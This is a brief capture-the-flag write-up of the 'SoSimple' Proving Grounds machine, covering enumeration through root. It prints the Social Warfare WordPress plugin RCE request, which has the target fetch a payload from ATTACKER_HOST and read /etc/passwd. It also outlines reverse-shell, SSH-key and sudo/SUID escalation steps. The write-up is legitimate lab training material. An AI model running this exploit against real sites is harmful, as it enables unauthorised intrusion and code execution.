SoSimple - Proving Grounds Play
Enumeration
Nmap
Initial nmap scan revealed HTTP and SSH ports were open.
Web Enumeration
The website included a PNG and nothing else.
So I applied directory brute forcing and found wordpress endpoint.
Then I ran WPScan and found valid users.
However, I could not find users’ password with brute forcing.
Later, I checked plugin versions and found Social Warfare Plugin is outdated.
Exploitation
Remote Code Execution
Searching through the web, I found Social Warfare RCE PoC from official wpscan site. It was simple:
- Create payload file and host it on a location accessible by a targeted website. Payload content : “<pre>system(‘cat /etc/passwd’)</pre>”
- Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
- Content of /etc/passwd will be returned
So at first, I created a reverse shell payload and hosted it.
Then visited the web page mentioned in the PoC step 2.
Then I simply got a reverse shell.
Rabbit Hole 1
Initially I checked wp-config.php and it was useless. Then I found secretkey.txt file but it was a rabbit-hole.
Then I checked home pages of users and found user flag.
Privilege Escalation
2nd Rabbit Hole
There was a 2nd rabbit hole on max’s home page.
id_rsa
The id_rsa of max was readable by www-data.
So I simply copied it and logged in to max using SSH.
Running service as steven
sudo -l command revealed that max could run service command as steven user. There was gtfobins page available for service command. I simply followed sudo privilege escalation steps and obtained steven user.
sudo -l to root
Steven user could run a script as root. But the script was not available.
I simply created that script to give SUID privileges to /bin/bash and then obtained root shell and the root flag.